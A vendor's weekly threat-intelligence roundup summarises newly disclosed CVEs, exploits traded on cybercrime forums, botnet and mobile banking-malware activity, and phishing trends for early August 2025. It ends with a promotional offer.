In the latest weekly vulnerability insights to clients, Cyble Research & Intelligence Labs has spotlighted a concerning surge in security weaknesses affecting a broad spectrum of digital products and services. From July 30 to August 5, 2025, Cyble’s vulnerability intelligence module tracked 717 new vulnerabilities.  

Among these, more than 222 come with publicly available Proof-of-Concept (PoC) exploits, signaling an increased likelihood of imminent cyberattacks and reducing the defenders’ window to deploy patches or mitigations. 

End-of-Life Products Pose Persistent Threats 

A particularly worrisome finding from Cyble’s report is the identification of 17 vulnerabilities in products that have reached their end-of-life (EOL) stage. This includes software and hardware from vendors such as PHP Charts, Glossword, Kordil, WP-Property Plugin, Linksys, Netgear, and D-Link.  

Because EOL products no longer receive security updates, these vulnerabilities represent “soft targets” for attackers, who can exploit these weaknesses indefinitely without risk of patch intervention. 

Zero-Day Vulnerability and Underground Exploit Trading 

The report also uncovered one zero-day vulnerability disclosed during this week. Cyble’s vulnerability intelligence team continuously monitors not only surface web disclosures but also underground cybercrime forums.  

This week, five vulnerabilities were actively discussed and traded among threat actors in these clandestine communities, demonstrating the rapid commercial circulation of exploit code. 

In addition, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) expanded its Known Exploited Vulnerabilities (KEV) catalog by adding three new D-Link device vulnerabilities that are currently being exploited in the wild.  

These flaws jeopardize network security by allowing attackers to gain unauthorized access to devices. 

Major Vendors and Critical Vulnerabilities in Focus 

During this reporting period, Apple, Code Projects, Dell, Portabilis, and Anisha topped the list of vendors with newly disclosed vulnerabilities, indicating widespread exposure across diverse technological ecosystems, including enterprise platforms and embedded systems. 

Out of the total vulnerabilities tracked, 114 received critical ratings based on CVSS v3.1 standards, with an additional 39 deemed critical under the newer CVSS v4.0 framework. High-profile critical flaws include: 

• CVE-2025-54948 and CVE-2025-54987: These remote code execution (RCE) vulnerabilities in Trend Micro Apex One’s on-premise management console permit attackers to upload and execute malicious code without authentication. Successful exploitation could result in complete system compromise. 

• CVE-2014-125113: A critical unrestricted file upload vulnerability found in Dell’s KACE K1000 Systems Management Appliance also carries a high risk of remote code execution, allowing threat actors to stealthily infiltrate systems. 

Such vulnerabilities drastically reduce the effort required for attackers to take control of systems, potentially exposing sensitive data and operational infrastructure. 

Trending Vulnerabilities in Enterprise and Open-Source Software 

Several vulnerabilities have been trending heavily in both open-source communities and underground forums due to their severity and exploitability: 

• CVE-2025-53770: A deserialization flaw in Microsoft SharePoint Server enables unauthenticated remote code execution. This vulnerability has been actively exploited in persistent enterprise intrusions. 

• CVE-2025-54253: An authentication bypass in Adobe Experience Manager (AEM) Forms allows attackers to execute remote code. 

• CVE-2025-40599: A vulnerability in SonicWall SMA 100 series appliances that allows authenticated arbitrary file uploads, risking full device takeover. 

• CVE-2025-6558: A critical input validation bug impacting Google Chrome’s ANGLE and Apple’s WebKit browser engine threatens millions of users with potential remote attacks. 

Exploit Activity on Cybercrime Forums 

Cyble Research & Intelligence Labs (CRIL) identified cybercriminal activity trading exploits for critical vulnerabilities, including: 

• The Microsoft SharePoint zero-day (CVE-2025-53770). 

• NVIDIA Container Toolkit container escape vulnerability (CVE-2025-23266), which grants root access in AI and cloud environments. 

• Multiple authentication bypasses in CrushFTP servers (CVE-2025-31161 and CVE-2025-2825), enabling full server control. 

• An unauthenticated remote code execution vulnerability in the Pterodactyl game server management software (CVE-2025-49132). 

A notable zero-day exploit dubbed SMBGhost, targeting the SMB protocol for remote code execution on Windows versions 10, 11, and Windows Server 2019 through 2025, was also offered on an underground forum. The threat actor claimed to have tested the exploit but did not list a price. 

Another cybercriminal discussed a critical RCE vulnerability in Synology TC500 IP cameras’ firmware 1.1.2-0416, involving a format string bug in a web service handling HTTP requests. Despite modern mitigations like ASLR and PIE, this flaw allowed arbitrary memory writes and was patched in Synology firmware version 1.1.3-0442. 

Cyble’s Threat Hunting Service, Vulnerability Intelligence, and Sensor Intelligence 

Cyble’s Threat Hunting Service plays a crucial role in capturing real-time cyberattack intelligence globally through an extensive network of honeypots and advanced analytic tools. This proactive strategy enables Cyble to detect exploit attempts, malware infections, phishing campaigns, and brute force attacks as they unfold. 

Sensor Intelligence Reports provide deep dives into attacks involving prominent malware families like CoinMiner Linux, WannaCry ransomware, Linux Mirai botnet, and IRCBot, demonstrating evolving attacker techniques.  

The reports also detail phishing campaigns, identifying key targeted regions, exploited network ports, and source IP infrastructure, delivering critical Indicators of Compromise (IoCs) for rapid defense. 

IoT and Linux Systems Under Attack 

The report highlights ongoing threats to Internet of Things (IoT) devices and Linux systems, with malware families Mirai and Gafgyt continuing to exploit unpatched devices. Additionally, Cyble’s sensors have detected exploitation attempts against Telerik UI and Cisco Adaptive Security Appliance (ASA) components. 

Selected vulnerabilities of interest include: 

• CVE-2025-34031: The Moodle LMS Jmol plugin suffers from an unauthenticated path traversal bug that allows access to sensitive server files, including database credentials. 

• CVE-2025-32814: Infoblox NETMRI’s SQL injection flaw allows unauthenticated attackers to manipulate backend databases. 

• CVE-2025-31161: CrushFTP authentication bypass through a race condition, enabling attackers to assume admin privileges. 

• CVE-2024-36401: OSGeo GeoServer remote code execution via unsafe OGC request parameter evaluation. 

• CVE-2024-29269: Command injection in Telesquare TLR-2005Ksh devices allows arbitrary system command execution. 

Other significant vulnerabilities include SQL injections, SSRF exposures, and multiple critical issues affecting D-Link NAS devices, some of which allow the disclosure of sensitive information or the use of hardcoded credentials. 

Emerging Attack Patterns: Cisco ASA and QNAP Devices 

Cyble’s sensors continue to detect scanning and exploitation attempts against Cisco ASA WebVPN login interfaces, vulnerable to cross-site scripting, path traversal, and HTTP response splitting attacks. QNAP QTS firmware also faces multiple command injection vulnerabilities that threaten millions of NAS devices globally. 

Meanwhile, the Mirai botnet variant actively targets Dasan GPON routers by exploiting well-known vulnerabilities (CVE-2018-10561 and CVE-2018-10562), enabling unauthenticated command injection and authentication bypass, and facilitating large-scale DDoS attacks. 

Financial Sector Malware Campaigns 

One particularly malware campaign targets Bengali-speaking users through fake remittance apps designed to steal banking credentials and payment card data. The malware uses a two-stage payload employing XOR encryption to evade detection. Victims are shown counterfeit banking interfaces while data is exfiltrated quietly. 

The campaign also deploys covertly operated Monero cryptocurrency miners, activated remotely via Firebase Cloud Messaging during low device activity, using RandomX-optimized mining software compatible with mobile CPUs. This multifaceted attack demonstrates the growing complexity of mobile-targeted financial threats. 

Malware and Phishing Threats Persist 

Cyble’s sensors continue to track several high-profile malware families: 

• CoinMiner Linux silently mines cryptocurrency by consuming system resources. 

• WannaCry ransomware still attempts propagation through EternalBlue exploits. 

• Linux Mirai and IRCBot remain active, infecting IoT devices and Linux servers for botnet operations. 

Phishing remains a prevalent threat vector, with attackers using impersonation, spoofed email addresses, and social engineering tactics such as urgency and fake compensation claims to extract sensitive information or money from victims. Cyble identified over 52,900 new phishing-related email addresses this week alone, documenting them as Indicators of Compromise for defenders. 

Conclusion 

This week’s vulnerability report highlights the growing challenge security teams face in keeping up with a high volume of exploitable flaws alongside active threats targeting IoT, enterprise systems, and critical infrastructure. 

To stay protected from such threats, organizations must adopt a risk-based vulnerability management approach, implement Zero-Trust principles, harden configurations, and maintain strong monitoring and incident response capabilities. 

Cyble vulnerability intelligence empowers defenders with real-time threat visibility, exploit tracking, and early warnings from dark web sources. Get a free external threat profile today to assess your exposure and strengthen your defenses.